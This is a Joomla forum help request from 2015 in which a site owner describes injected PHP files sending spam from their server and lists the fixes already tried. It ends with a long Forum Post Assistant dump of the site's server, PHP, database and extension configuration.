One day i received an spam abuse notification from my server. I couldn't identify the file or script that was sending the emails until i activated a header for spam abuse that indicates the file or path that is sending it. When i identified the file (attachments) it's an encrypted php (i think) that is sending email (i think)
All started in July 4th 2015, on this date i received the first abuse notification. It seems the hacker (or robot) uploaded the php file with the script. In sendmail log, i identified this:
In that path, i found the 2 files attached on this post. The first time i detected the ini.php file and erased it, i deleted a lot of unused plugins and everything was working fine... until i received another abuse notification with the second php file (inc.php) uploaded in a different location.
php file injection?
I already followed all the security steps (i think) and i ran the FPA:
Problem Description :: Forum Post Assistant (v1.2.4) : 25th August 2015 wrote:Injection of PHP file sending spam emails
Log/Error Message :: Forum Post Assistant (v1.2.4) : 25th August 2015 wrote:spam abuse
Actions Taken To Resolve by Forum Post Assistant (v1.2.4) 25th August 2015 wrote:- Changed all passwords
- Update joomla
- Delete extensions
- Verify current extensions
- Verify folders permission
Any help? Thank you!Forum Post Assistant (v1.2.4) : 25th August 2015 wrote:Basic Environment :: wrote:Joomla! Instance :: Joomla! 3.4.3-Stable (Ember) 2-July-2015
Joomla! Platform :: Joomla Platform 13.1.0-Stable (Curiosity) 24-Apr-2013
Joomla! Configured :: Yes | Read-Only (444) | Owner: nenasric (uid: 1/gid: 1) | Group: nenasric (gid: 1) | Valid For: 3.4
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes
Host Configuration :: OS: Linux | OS Version: 2.6.32-042stab088.4 | Technology: x86_64 | Web Server: Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 | Encoding: gzip, deflate | Doc Root: /home/nenasric/public_html | System TMP Writable: Yes
PHP Configuration :: Version: 5.4.29 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 24567 | Log Errors To: error_log | Last Known Error: 25th August 2015 21:40:42. | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 250M | Max. POST Size: 500M | Max. Input Time: 1000 | Max. Execution Time: 120 | Memory Limit: 128M
MySQL Configuration :: Version: 5.5.42-cll (Client:5.5.42) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 9.43 MiB | #of Tables: 133Detailed Environment :: wrote:PHP Extensions :: Core (5.4.29) | date (5.4.29) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7) | zlib (2.0) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | fileinfo (1.0.5) | filter (0.11.0) | ftp () | gd () | gettext () | hash (1.0) | iconv () | SPL (0.2) | json (1.2.1) | mbstring () | mcrypt () | session () | mysql (1.0) | mysqli (0.1) | standard (5.4.29) | Phar (2.0.1) | posix () | Reflection ($Id: f6367cdb4e3f392af4a6d441a6641de87c2e50c4 $) | mysqlnd (mysqlnd 5.0.10 - 20111026 - $Id: c85105d7c6f7d70d609bb4c000257868a40840ab $) | SimpleXML (0.1) | sockets () | imap () | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | zip (1.11.0) | cgi-fcgi () | XCache (3.0.3) | PDO (1.0.4dev) | pdo_sqlite (1.0.1) | pdo_mysql (1.0.2) | XCache Cacher (3.0.3) | ionCube Loader () | Zend Engine (2.4.0) |
Potential Missing Extensions :: suhosin |
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: NoFolder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Elevated Permissions (First 10) ::Database Information :: wrote:Database _FPA_STATS :: Uptime: 1855113 | Threads: 4 | Questions: 20047691 | Slow queries: 461 | Opens: 316070 | Flush tables: 1 | Open tables: 2047 | Queries per second avg: 10.806 |Extensions Discovered :: wrote:Components :: SITE :: com_wrapper (3.0.0) | com_mailto (3.0.0) |
Components :: ADMIN :: com_checkin (3.0.0) | Spider Video Player (2.8.5) | com_menus (3.0.0) | com_users (3.0.0) | joautotwitter (3.2) | com_admin (3.0.0) | com_postinstall (3.2.0) | com_ajax (3.2.0) | com_messages (3.0.0) | com_redirect (3.0.0) | com_content (3.0.0) | com_login (3.0.0) | com_banners (3.0.0) | com_modules (3.0.0) | com_newsfeeds (3.0.0) | com_tags (3.1.0) | com_joomlaupdate (3.0.0) | com_phocagallery (4.1.2) | com_tagmeta (1.7.2) | com_finder (3.0.0) | com_contenthistory (3.2.0) | offlajn_installer (1.0) | com_templates (3.0.0) | com_search (3.0.0) | com_installer (3.0.0) | com_cpanel (3.0.0) | com_categories (3.0.0) | FW Gallery (2.3.2) | com_cache (3.0.0) | com_config (3.0.0) | com_media (3.0.0) | com_languages (3.0.0) | com_plugins (3.0.0) |
Modules :: SITE :: mod_login (3.0.0) | mod_random_image (3.0.0) | mod_footer (3.0.0) | mod_breadcrumbs (3.0.0) | Spider Video Player Module (2.8.5) | mod_custom (3.0.0) | mod_articles_category (3.0.0) | mod_languages (3.0.0) | mod_search (3.0.0) | mod_feed (3.0.0) | mod_articles_popular (3.0.0) | mod_articles_categories (3.0.0) | mod_users_latest (3.0.0) | mod_tags_similar (3.1.0) | mod_stats (3.0.0) | mod_articles_archive (3.0.0) | mod_articles_news (3.0.0) | mod_finder (3.0.0) | mod_whosonline (3.0.0) | mod_menu (3.0.0) | mod_related_items (3.0.0) | mod_tags_popular (3.1.0) | mod_syndicate (3.0.0) | mod_banners (3.0.0) | Flexi Custom Code (1.3) | mod_articles_latest (3.0.0) | mod_wrapper (3.0.0) |
Modules :: ADMIN :: mod_login (3.0.0) | mod_popular (3.0.0) | mod_version (3.0.0) | mod_custom (3.0.0) | mod_feed (3.0.0) | mod_stats_admin (3.0.0) | mod_toolbar (3.0.0) | mod_latest (3.0.0) | mod_status (3.0.0) | mod_title (3.0.0) | mod_logged (3.0.0) | mod_menu (3.0.0) | mod_submenu (3.0.0) | mod_multilangstatus (3.0.0) | mod_quickicon (3.0.0) |
Plugins :: SITE :: plg_finder_categories (3.0.0) | plg_finder_contacts (3.0.0) | plg_finder_content (3.0.0) | plg_finder_newsfeeds (3.0.0) | plg_finder_tags (3.0.0) | plg_editors-xtd_pagebreak (3.0.0) | plg_editors-xtd_readmore (3.0.0) | plg_editors-xtd_article (3.0.0) | plg_editors-xtd_image (3.0.0) | plg_editors-xtd_phocagallery (4.1.2) | plg_system_redirect (3.0.0) | plg_system_cache (3.0.0) | PLG_SYSTEM_HEADERTAGS (3.1.9) | plg_system_log (3.0.0) | plg_system_languagecode (3.0.0) | System - JO Auto Post Twitter (3.1) | plg_system_p3p (3.0.0) | Offlajn Joomla 3.0 compatibili (1.0) | System - Marco's SQL Injection (1.4) | plg_system_logout (3.0.0) | Offlajn Dojo Loader (1.0) | plg_system_tagmeta (1.7.2) | System - Offlajn Params (1.0.0) | plg_system_debug (3.0.0) | plg_system_sef (3.0.0) | plg_system_highlight (3.0.0) | plg_system_remember (3.0.0) | plg_system_languagefilter (3.0.0) | plg_authentication_gmail (3.0.0) | plg_authentication_joomla (3.0.0) | plg_authentication_cookie (3.0.0) | plg_authentication_ldap (3.0.0) | FW Gallery - Batch Upload (1.3.0) | plg_user_contactcreator (3.0.0) | plg_user_joomla (3.0.0) | plg_user_profile (3.0.0) | plg_captcha_recaptcha (3.4.0) | plg_quickicon_extensionupdate (3.0.0) | plg_quickicon_joomlaupdate (3.0.0) | plg_content_emailcloak (3.0.0) | plg_content_finder (3.0.0) | plg_content_pagebreak (3.0.0) | plg_content_vote (3.0.0) | plg_content_joomla (3.0.0) | plg_content_loadmodule (3.0.0) | Content - Load Spider Video Pl (2.8.5) | plg_content_pagenavigation (3.0.0) | plg_content_phocagallery (4.1.2) | plg_search_categories (3.0.0) | plg_search_contacts (3.0.0) | plg_search_content (3.0.0) | plg_search_newsfeeds (3.0.0) | plg_search_tags (3.0.0) | plg_editors_codemirror (5.3) | plg_editors_tinymce (4.1.7) | plg_extension_joomla (3.0.0) | plg_twofactorauth_yubikey (3.2.0) | plg_twofactorauth_totp (3.2.0) | plg_installer_webinstaller (1.0.5) |Templates Discovered :: wrote:Templates :: SITE :: protostar (1.0) | beez3 (3.1.0) |
Templates :: ADMIN :: hathor (3.0.0) | isis (1.0) |